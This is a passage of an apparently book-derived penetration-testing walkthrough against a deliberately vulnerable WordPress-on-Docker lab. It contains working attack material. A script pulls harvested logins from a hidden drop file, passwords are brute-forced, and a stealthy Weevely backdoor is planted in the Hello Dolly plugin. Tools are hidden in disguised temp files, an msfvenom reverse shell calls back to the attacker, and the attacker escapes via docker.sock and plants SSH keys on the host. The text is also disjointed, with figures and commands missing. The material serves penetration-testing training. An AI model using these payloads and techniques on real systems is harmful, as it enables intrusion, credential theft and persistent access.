{"log":"msmith","pwd":"iYQN)e#a4s*rLe7ZhWhfS&^v","wp-submit":"Log In","redirect_to":"https:\/\/round-lake.dustinice.workers.dev:443\/http\/cookingwithfire.local\/wp-admin\/","testcookie":"1"}
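Since each line in the drop file is an independent Base64-encoded JSON object, harvesting every captured login can be scripted; a minimal sketch, assuming a recent Node.js runtime on our attack machine:

// Sketch: fetch the credential drop file and decode each captured login.
// Each line is base64(JSON of the POSTed login form), appended by the backdoor.
fetch('http://cookingwithfire.local/wp-content/uploads/.index.php.swp')
  .then(res => res.text())
  .then(body => {
    body.split('\n').filter(Boolean).forEach(line => {
      const creds = JSON.parse(Buffer.from(line, 'base64').toString('utf8'));
      console.log(creds.log + ' : ' + creds.pwd);
    });
  });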
- Docker
The following figure illustrates how containers can run full application
stacks adjacent to each other without conflict. A notable difference
between this and the traditional VM is the kernel component.
Containers are possible because of the ability to isolate processes
using control groups (cgroups) and namespaces.
In the following figure, you can see the difference between Docker
containers and traditional hypervisors (VM software), such as
VMware, Hyper-V, or VirtualBox:
Figure 13.2: The difference between Docker containers and traditional hypervisors (source:
Docker)
Note
The VM package is available for download on NotSoSecure's
site: https://www.notsosecure.com/vulnerable-docker-vm/.
Once the VM is up and running, the console screen will display its
DHCP-issued IP address. For the sake of clarity, we will use
vulndocker.internal as the domain pointing to the Docker instance:
The next step in our attack will be running the wpscan tool, looking for any low-hanging fruit, and gathering as much information about the instance as possible.
Note
The wpscan tool is available on Kali and almost any other
penetration-testing-focused distribution. The latest version can
be pulled from https://github.com/wpscanteam/wpscan.
We can start our attack by issuing a wpscan command in the attack
machine terminal. By default, passive detection will be enabled to
look for available plugins, as well as various other rudimentary
checks. We can point the scanner to our application using the --url
switch, passing the full URL, including the port 8000, as the value.
The scan results for this instance are pretty dry. The Full Path
Disclosure (FPD) vulnerability may come in handy if we have to
blindly drop a shell on disk through a MySQL instance (as we've
done in previous chapters), or if we find a local file inclusion
vulnerability. The XML-RPC interface appears to be available, which
may come in handy a little later. For now, we will make a note of
these findings.
There are seemingly endless plugins for WordPress and most of the
WordPress-related breaches come from outdated and vulnerable
plugins. In our case, however, this simple blog does not use any
visible plugins. The default wpscan plugin enumeration is passive; if a
plugin is installed but not in use, it may not be detected. There is an
option to actively test for the existence of plugins using a predefined
database of known plugins.
This scan will run for a few minutes but in this scenario, it does not
return anything interesting. wpscan can also use some effective
information disclosure techniques in WordPress, which can reveal
some of the post authors and their respective login usernames.
Enumerating users will be the next activity and hopefully we can
attack the admin account, and move up to shell access.
[...]
[+] Starting the password brute forcer
Brute Forcing 'bob' Time: 00:01:23 <====              > (2916 / 10001) 29.15% ETA: 00:03:22
+----+-------+------+----------+
| Id | Login | Name | Password |
+----+-------+------+----------+
|    | bob   |      | Welcome1 |
+----+-------+------+----------+
root@kali:~# msfconsole -q
msf >
If we are trying to stay under the radar and avoid detection, we can
opt for a more manual approach. Since we have full control over the
CMS, we can create a custom plugin and upload it, just as
Metasploit has done, or better yet, we can backdoor existing ones.
For this scenario, we won't be uploading the PHP shell to disk and
accessing it directly. Instead, we will modify an existing file and inject
the contents somewhere inside. There are several options available
to us, but we will go with the Hello Dolly plugin, which ships with
WordPress. The WordPress admin panel provides a Plugins >
Editor function, which allows the modification of plugin PHP code.
Attackers love applications that have this feature, as it makes
everyone's life much easier.
Our target is the hello.php file from the Hello Dolly plugin. The
majority of its contents will be replaced by the generated weevely
shell.php file, as shown in the following figure:
It's probably a good idea to leave the header intact, in case any
passing administrators glance at the plugin. We can also leave most
of the file intact, as long as it doesn't produce any unwanted error
messages. PHP warnings and parse errors will interfere with
Weevely and the backdoor will not work. We've seen that the wpscan
results suggest that this application does not suppress error
messages. For the sake of stealth, we have to remember this going
forward.
In the preceding code block, we have closed the <?php tag with ?>
before pasting in the Weevely shell contents. Once the file is
updated successfully, the Weevely shell can be accessed via the
URL http://vulndocker.internal:8000/wp-content/plugins/hello.php:
root@kali:~/tools# weevely http://vulndocker.internal:8000/wp-content/plugins/hello.php Dock3r%Knock3r
weevely> uname -a
Linux 8f4bca8ef241 3.13.0-128-generic #177-Ubuntu SMP x86_64 GNU/Linux
www-data@8f4bca8ef241:/var/www/html/wp-content/plugins $
weevely> ifconfig
sh: 1: ifconfig: not found
weevely> wget
sh: 1: wget: not found
weevely> nmap
sh: 1: nmap: not found
weevely> curl
curl: try 'curl --help' or 'curl --manual' for
more information
Since the container does not have the nmap binary available, we can
download it with curl and make it executable with chmod. We'll use
/tmp/sess_[random] as the filename template, to try and blend in as
dummy session files, in case any administrator is glancing through
the system temp folder:
Just as with the nmap binary, we have to make the file executable using chmod and the +x parameter:
Now that we have some tools, we can get our bearings by running
the recently uploaded ifconfig command:
Now that we have an idea of what to look at, we can call up the nmap
binary (/tmp/sess_IWxvbCBwaHAgc2Vzc2lvbnMu) to do a quick service
scan on the container network:
root@kali:~# msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.193 LPORT=443 -f elf > /root/tools/nix64_rev443
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 96 bytes
Final size of elf file: 216 bytes
We will have to set the PAYLOAD variable to a value that matches our
malware's:
The LHOST and LPORT should also reflect what the malware was
configured with, to ensure it is listening on the appropriate IP
address and port:
Finally, we can run the handler module to spawn a listener and wait
for incoming Meterpreter sessions:
Once that's done, we can upload and execute the reverse shell
nix64_rev443 onto the container. We can use Weevely to help us
with this as well:
With the malware safely in the target's temp folder, we have to make
it an executable using chmod, and finally, just call it directly:
Auxiliary action:

  Name   Description
  ----   -----------
  Proxy
Note
ProxyChains is available on all penetration testing distros:
http://proxychains.sourceforge.net/.
The Nmap scan report for the content_ssh_1 container also had the
SSH port open, but this service is typically harder to exploit, short of
brute-forcing for weak credentials:
meterpreter >
Once back inside the Meterpreter session, we can drop further into
the target container's terminal using the shell Meterpreter
command:
meterpreter > shell
Process 230 created.
Channel 16 created.
We may not see the typical Linux prompt, but we can execute simple
Linux terminal commands, such as curl, to inspect the 8022 service
on the 172.18.0.2 container:
curl -s 172.18.0.2:8022
<!DOCTYPE html>
<html style="height:100%; !important;">
<head>
<title>Docker-SSH</title>
<script src="/js/jquery-1.11.3.min.js"></script>
<script src="/js/term.js"></script>
<link rel="stylesheet" href="/css/term.css"
type="text/css" />
</head>
<body>
Note
Docker-SSH is available on Docker Hub and on
https://github.com/jeroenpeeters/docker-ssh.
root@kali:~# proxychains curl -s 172.18.0.2:8022
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:1080-<><>-172.18.0.2:8022-<><>-OK
<!DOCTYPE html>
<html style="height:100%; !important;">
<head>
<title>Docker-SSH</title>
<script src="/js/jquery-1.11.3.min.js"></script>
<script src="/js/term.js"></script>
<link rel="stylesheet" href="/css/term.css"
type="text/css" />
</head>
<body>
###############################################################
## Docker SSH ~ Because every container should be accessible ##
###############################################################
## container | content_db_1                                  ##
###############################################################
/ $
/ $ id
uid=0(root) gid=0(root) groups=0(root)
/ $
/ $ /bin/bash
root@13f0a3bb2706:/# ls -lah /var/run/docker.sock
srw-rw---- 1 root mysql 0 Aug 20 14:08 /var/run/docker.sock
This is all made possible by the exposed Docker socket found at /var/run/docker.sock. The Docker client uses this special file to communicate with the Docker host API and issue arbitrary commands.
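To illustrate why this matters, anything that can reach this socket can drive the Docker API directly; a minimal sketch, assuming a Node.js runtime is available (which may not be the case on a real target), that performs the equivalent of docker ps:

// Sketch: querying the Docker API over the exposed UNIX socket.
const http = require('http');

const req = http.request({
  socketPath: '/var/run/docker.sock',
  path: '/containers/json',   // list running containers
  method: 'GET'
}, res => {
  let body = '';
  res.on('data', chunk => body += chunk);
  res.on('end', () => console.log(JSON.parse(body)));
});

req.end();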
root@a39621d553e4:/# ls -lah /
total 76K
drwxr-xr-x 35 root root 4.0K Oct 7 01:38 .
drwxr-xr-x 35 root root 4.0K Oct 7 01:38 ..
-rwxr-xr-x 1 root root 0 Oct 7 01:38
.dockerenv
[...]
drwxr-xr-x 2 root root 4.0K Oct 7 01:38 home
drwxr-xr-x 22 root root 4.0K Aug 20 14:11 host
[...]
drwx------ 2 root root 4.0K Oct 7 01:38 root
[...]
root@a39621d553e4:/#
root@33f559573304:/# ps x
PID TTY STAT TIME COMMAND
1 ? Ss 0:04 /sbin/init
[...]
751 ?        Ssl    1:03 /usr/bin/dockerd --raw-logs
[...]
14966 ? R+ 0:00 ps x
Note
Remember the ROE and remove any artifacts, such as
authorized SSH keys, once the engagement has completed.
Back inside the container, we can append our key to the Docker
host's authorized_keys file, granting us root access through SSH
public key authentication:
From our attack box, we can pivot through our Meterpreter session,
get inside the container network, and authenticate to the SSH
service of 172.18.0.1, which we've previously suspected, based on
nmap results, belongs to the host: